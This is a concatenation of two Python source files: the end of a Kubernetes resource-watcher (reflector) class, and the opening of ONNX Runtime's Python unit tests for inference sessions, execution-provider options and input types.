If self.omit_namespace is False you want something of the form
list_namespaced_<resource> - for example,
`list_namespaced_pod` will give you a PodReflector. It will
take its namespace from self.namespace (which therefore should
not be None).
If self.omit_namespace is True, you want
list_<resource>_for_all_namespaces.
This must be set by a subclass.
It is not necessary to set it for pod or event reflectors, because
__init__ will figure it out. If you create your own reflector
subclass you probably want to add the logic to choose the method
name to that class's __init__().
""",
)
api_group_name = Unicode(
'CoreV1Api',
help="""
Name of class that represents the apigroup on which
`list_method_name` is to be found.
Defaults to CoreV1Api, which has everything in the 'core' API group. If you want to watch Ingresses,
for example, you would have to use ExtensionsV1beta1Api
""",
)
request_timeout = Int(
60,
config=True,
help="""
Network timeout for kubernetes watch.
Trigger watch reconnect when a given request is taking too long,
which can indicate network issues.
""",
)
timeout_seconds = Int(
10,
config=True,
help="""
Timeout for kubernetes watch.
Trigger watch reconnect when no watch event has been received.
This will cause a full reload of the currently existing resources
from the API server.
""",
)
restart_seconds = Int(
30,
config=True,
help="""
Maximum time before restarting a watch.
The watch will be restarted at least this often,
even if events are still arriving.
Avoids trusting kubernetes watch to yield all events,
which seems to not be a safe assumption.
""",
)
on_failure = Any(help="""Function to be called when the reflector gives up.""")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# client configuration for kubernetes has already taken place
self.api = shared_client(self.api_group_name)
# FIXME: Protect against malicious labels?
self.label_selector = ','.join(
['{}={}'.format(k, v) for k, v in self.labels.items()]
)
self.field_selector = ','.join(
['{}={}'.format(k, v) for k, v in self.fields.items()]
)
self.first_load_future = Future()
self._stop_event = threading.Event()
# Make sure that we know kind, whether we should omit the
# namespace, and what our list_method_name is. For the things
# we already know about, we can derive list_method_name from
# those two things. New reflector types should also update
# their __init__() methods to derive list_method_name, but you
# could just set it directly in the subclass.
if not self.list_method_name:
plural_to_singular = {
"endpoints": "endpoints",
"events": "event",
"ingresses": "ingress",
"pods": "pod",
"services": "service",
}
if self.kind in plural_to_singular:
if self.omit_namespace:
self.list_method_name = (
f"list_{plural_to_singular[self.kind]}_for_all_namespaces"
)
else:
self.list_method_name = (
f"list_namespaced_{plural_to_singular[self.kind]}"
)
# Make sure we have the required values.
if not self.kind:
raise RuntimeError("Reflector kind must be set!")
if not self.list_method_name:
raise RuntimeError("Reflector list_method_name must be set!")
self.start()
def __del__(self):
self.stop()
def _list_and_update(self):
"""
Update current list of resources by doing a full fetch.
Overwrites all current resource info.
"""
initial_resources = None
kwargs = dict(
label_selector=self.label_selector,
field_selector=self.field_selector,
_request_timeout=self.request_timeout,
_preload_content=False,
)
if not self.omit_namespace:
kwargs["namespace"] = self.namespace
initial_resources = getattr(self.api, self.list_method_name)(**kwargs)
# This is an atomic operation on the dictionary!
initial_resources = json.loads(initial_resources.read())
self.resources = {
f'{p["metadata"]["namespace"]}/{p["metadata"]["name"]}': p
for p in initial_resources["items"]
}
# return the resource version so we can hook up a watch
return initial_resources["metadata"]["resourceVersion"]
def _watch_and_update(self):
"""
Keeps the current list of resources up-to-date
This method is to be run not on the main thread!
We first fetch the list of current resources, and store that. Then we
register to be notified of changes to those resources, and keep our
local store up-to-date based on these notifications.
We also perform exponential backoff, giving up after we hit 32s
wait time. This should protect against network connections dropping
and intermittent unavailability of the api-server. Every time we
recover from an exception we also do a full fetch, to pick up
changes that might've been missed in the time we were not doing
a watch.
Note that we're playing a bit with fire here, by updating a dictionary
in this thread while it is probably being read in another thread
without using locks! However, dictionary access itself is atomic,
and as long as we don't try to mutate them (do a 'fetch / modify /
update' cycle on them), we should be ok!
"""
selectors = []
log_name = ""
if self.label_selector:
selectors.append("label selector=%r" % self.label_selector)
if self.field_selector:
selectors.append("field selector=%r" % self.field_selector)
log_selector = ', '.join(selectors)
cur_delay = 0.1
if self.omit_namespace:
ns_str = "all namespaces"
else:
ns_str = "namespace {}".format(self.namespace)
self.log.info(
"watching for %s with %s in %s",
self.kind,
log_selector,
ns_str,
)
while True:
self.log.debug("Connecting %s watcher", self.kind)
start = time.monotonic()
w = watch.Watch()
try:
resource_version = self._list_and_update()
if not self.first_load_future.done():
# signal that we've loaded our initial data
self.first_load_future.set_result(None)
watch_args = {
"label_selector": self.label_selector,
"field_selector": self.field_selector,
"resource_version": resource_version,
}
if not self.omit_namespace:
watch_args["namespace"] = self.namespace
if self.request_timeout:
# set network receive timeout
watch_args['_request_timeout'] = self.request_timeout
if self.timeout_seconds:
# set watch timeout
watch_args['timeout_seconds'] = self.timeout_seconds
method = partial(
getattr(self.api, self.list_method_name), _preload_content=False
)
# in case of timeout_seconds, the w.stream just exits (no exception thrown)
# -> we stop the watcher and start a new one
for watch_event in w.stream(method, **watch_args):
# Remember that these events are k8s api related WatchEvents
# objects, not k8s Event or Pod representations, they will
# reside in the WatchEvent's object field depending on what
# kind of resource is watched.
#
# ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#watchevent-v1-meta
# ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#event-v1-core
cur_delay = 0.1
resource = watch_event['object']
ref_key = "{}/{}".format(
resource["metadata"]["namespace"], resource["metadata"]["name"]
)
if watch_event['type'] == 'DELETED':
# This is an atomic delete operation on the dictionary!
self.resources.pop(ref_key, None)
else:
# This is an atomic operation on the dictionary!
self.resources[ref_key] = resource
if self._stop_event.is_set():
self.log.info("%s watcher stopped", self.kind)
break
watch_duration = time.monotonic() - start
if watch_duration >= self.restart_seconds:
self.log.debug(
"Restarting %s watcher after %i seconds",
self.kind,
watch_duration,
)
break
except ReadTimeoutError:
# network read time out, just continue and restart the watch
# this could be due to a network problem or just low activity
self.log.warning("Read timeout watching %s, reconnecting", self.kind)
continue
except Exception:
cur_delay = cur_delay * 2
if cur_delay > 30:
self.log.exception("Watching resources never recovered, giving up")
if self.on_failure:
self.on_failure()
return
self.log.exception(
"Error when watching resources, retrying in %ss", cur_delay
)
time.sleep(cur_delay)
continue
else:
# no events on watch, reconnect
self.log.debug("%s watcher timeout", self.kind)
finally:
w.stop()
if self._stop_event.is_set():
self.log.info("%s watcher stopped", self.kind)
break
self.log.warning("%s watcher finished", self.kind)
def start(self):
"""
Start the reflection process!
We'll do a blocking read of all resources first, so that we don't
race with any operations that are checking the state of the pod
store - such as polls. This should be called only once at the
start of program initialization (when the singleton is being created),
and not afterwards!
"""
if hasattr(self, 'watch_thread'):
raise ValueError('Thread watching for resources is already running')
self._list_and_update()
self.watch_thread = threading.Thread(target=self._watch_and_update)
# If the watch_thread is only thread left alive, exit app
self.watch_thread.daemon = True
self.watch_thread.start()
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
class NamespacedResourceReflector(ResourceReflector):
"""
Watches for resources in a particular namespace. The list_methods
want both a method name and a namespace.
"""
omit_namespace = False
class MultiNamespaceResourceReflector(ResourceReflector):
"""
Watches for resources across all namespaces. The list_methods
want only a method name. Note that this requires the service account
to be significantly more powerful, since it must be bound to ClusterRoles
rather than just Roles, and therefore this is inherently more
dangerous.
"""
omit_namespace = True
|
onnxruntime_test_python.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import gc
import numpy as np
import onnxruntime as onnxrt
import os
import platform
import sys
import threading
import unittest
from helper import get_name
from onnxruntime.capi.onnxruntime_pybind11_state import Fail
# handle change from python 3.8 and on where loading a dll from the current directory needs to be explicitly allowed.
if platform.system() == 'Windows' and sys.version_info.major >= 3 and sys.version_info.minor >= 8:
os.add_dll_directory(os.getcwd())
available_providers = [provider for provider in onnxrt.get_available_providers()]
# TVM EP doesn't support:
# * calling Run() on different threads using the same session object
# * symbolic inputs
# * string inputs
# * byte type inputs
# * object type inputs
# * void type inputs
# * SequenceConstruct operator
# * custom operators
# * testSequenceInsert
# * testSequenceLength
available_providers_without_tvm = [
provider for provider in onnxrt.get_available_providers()
if provider not in {'TvmExecutionProvider'}]
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testTvmImported(self):
if "TvmExecutionProvider" not in onnxrt.get_available_providers():
return
import tvm
self.assertTrue(tvm is not None)
def testModelSerialization(self):
try:
so = onnxrt.SessionOptions()
so.log_severity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so, providers=['CPUExecutionProvider'])
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
except Fail as onnxruntime_error:
if str(onnxruntime_error) == "[ONNXRuntimeError] : 1 : FAIL : Unable to serialize model as it contains" \
" compiled nodes. Please disable any execution providers which generate compiled nodes.":
pass
else:
raise onnxruntime_error
def testGetProviders(self):
self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=onnxrt.get_available_providers())
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testEnablingAndDisablingTelemetry(self):
onnxrt.disable_telemetry_events()
# no-op on non-Windows builds
# may be no-op on certain Windows builds based on build configuration
onnxrt.enable_telemetry_events()
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CUDAExecutionProvider'])
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testSetProvidersWithOptions(self):
if 'TensorrtExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['TensorrtExecutionProvider'])
self.assertIn('TensorrtExecutionProvider', sess.get_providers())
options = sess.get_provider_options()
option = options['TensorrtExecutionProvider']
self.assertIn('device_id', option)
self.assertIn('trt_max_partition_iterations', option)
self.assertIn('trt_min_subgraph_size', option)
self.assertIn('trt_max_workspace_size', option)
self.assertIn('trt_dump_subgraphs', option)
self.assertIn('trt_engine_cache_enable', option)
self.assertIn('trt_engine_cache_path', option)
self.assertIn('trt_force_sequential_engine_build', option)
max_partition_iterations = option['trt_max_partition_iterations']
new_max_partition_iterations = int(max_partition_iterations) + 1
min_subgraph_size = option['trt_min_subgraph_size']
new_min_subgraph_size = int(min_subgraph_size) + 1
ori_max_workspace_size = option['trt_max_workspace_size']
new_max_workspace_size = int(ori_max_workspace_size) // 2
option = {}
option['trt_max_partition_iterations'] = new_max_partition_iterations
option['trt_min_subgraph_size'] = new_min_subgraph_size
option['trt_max_workspace_size'] = new_max_workspace_size
dump_subgraphs = "true"
option['trt_dump_subgraphs'] = dump_subgraphs
engine_cache_enable = "true"
option['trt_engine_cache_enable'] = engine_cache_enable
engine_cache_path = './engine_cache'
option['trt_engine_cache_path'] = engine_cache_path
force_sequential_engine_build = "true"
option['trt_force_sequential_engine_build'] = force_sequential_engine_build
sess.set_providers(['TensorrtExecutionProvider'], [option])
options = sess.get_provider_options()
option = options['TensorrtExecutionProvider']
self.assertEqual(option['trt_max_partition_iterations'], str(new_max_partition_iterations))
self.assertEqual(option['trt_min_subgraph_size'], str(new_min_subgraph_size))
self.assertEqual(option['trt_max_workspace_size'], str(new_max_workspace_size))
self.assertEqual(option['trt_dump_subgraphs'], '1')
self.assertEqual(option['trt_engine_cache_enable'], '1')
self.assertEqual(option['trt_engine_cache_path'], str(engine_cache_path))
self.assertEqual(option['trt_force_sequential_engine_build'], '1')
# We currently disable following test code since that not all test machines/GPUs have nvidia int8 capability
'''
int8_use_native_calibration_table = "false"
option['trt_int8_use_native_calibration_table'] = int8_use_native_calibration_table
int8_enable = "true"
option['trt_int8_enable'] = int8_enable
calib_table_name = '/home/onnxruntime/table.flatbuffers' # this file is not existed
option['trt_int8_calibration_table_name'] = calib_table_name
with self.assertRaises(RuntimeError):
sess.set_providers(['TensorrtExecutionProvider'], [option])
'''
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
import sys
import ctypes
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CUDAExecutionProvider'])
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
option1 = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option1])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
option2 = {'device_id': -1}
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option2])
sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CUDAExecutionProvider'])
self.assertIn('CUDAExecutionProvider', sess.get_providers())
# test get/set of "gpu_mem_limit" configuration.
options = sess.get_provider_options()
self.assertIn('CUDAExecutionProvider', options)
option = options['CUDAExecutionProvider']
self.assertIn('gpu_mem_limit', option)
ori_mem_limit = option['gpu_mem_limit']
new_mem_limit = int(ori_mem_limit) // 2
option['gpu_mem_limit'] = new_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], str(new_mem_limit))
option['gpu_mem_limit'] = ori_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], ori_mem_limit)
def test_get_and_set_option_with_values(option_name, option_values):
provider_options = sess.get_provider_options()
self.assertIn('CUDAExecutionProvider', provider_options)
cuda_options = options['CUDAExecutionProvider']
self.assertIn(option_name, cuda_options)
for option_value in option_values:
cuda_options[option_name] = option_value
sess.set_providers(['CUDAExecutionProvider'], [cuda_options])
new_provider_options = sess.get_provider_options()
self.assertEqual(
new_provider_options.get('CUDAExecutionProvider', {}).get(option_name),
str(option_value))
test_get_and_set_option_with_values(
'arena_extend_strategy', ['kNextPowerOfTwo', 'kSameAsRequested'])
test_get_and_set_option_with_values(
'cudnn_conv_algo_search', ["DEFAULT", "EXHAUSTIVE", "HEURISTIC"])
test_get_and_set_option_with_values(
'do_copy_in_default_stream', [0, 1])
option['gpu_external_alloc'] = '0'
option['gpu_external_free'] = '0'
option['gpu_external_empty_cache'] = '0'
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_external_alloc'], '0')
self.assertEqual(options['CUDAExecutionProvider']['gpu_external_free'], '0')
self.assertEqual(options['CUDAExecutionProvider']['gpu_external_empty_cache'], '0')
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option['arena_extend_strategy'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
option = {'device_id': i}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
# configure session with invalid option values and that should fail
with self.assertRaises(RuntimeError):
option = {'device_id': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'device_id': 'invalid_value'}
sess.set_providers(['CUDAExecutionProvider'], [option])
# configure session with invalid option should fail
with self.assertRaises(RuntimeError):
option = {'invalid_option': 123}
sess.set_providers(['CUDAExecutionProvider'], [option])
libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(RuntimeError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
sess.set_providers(['InvalidProvider'])
self.assertTrue('Unknown Provider Type: InvalidProvider' in str(context.exception))
def testSessionProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=available_providers)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content, providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
# Skip this test for a "pure" DML onnxruntime python wheel.
# We keep this test enabled for instances where both DML and CUDA EPs are available
# (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precedence
# than DML and the nodes are assigned to only the CUDA EP (which supports this test).
if 'DmlExecutionProvider' in available_providers and 'CUDAExecutionProvider' not in available_providers:
print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run()"
" on different threads using the same session object.")
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so,
providers=available_providers_without_tvm)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=onnxrt.get_available_providers())
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"), providers=available_providers_without_tvm)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output X has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), providers=available_providers)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array([[True, False], [False, False]], dtype=bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
# numpy 1.20+ doesn't automatically pad the bytes based entries in the array when dtype is np.void,
# so we use inputs where that is the case
x = np.array([b'must', b'have', b'same', b'size'], dtype=np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['must', 'have'], ['same', 'size']], dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), providers=onnxrt.get_available_providers())
a = np.array([[True, True], [False, False]], dtype=bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path, providers=onnxrt.get_available_providers())
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
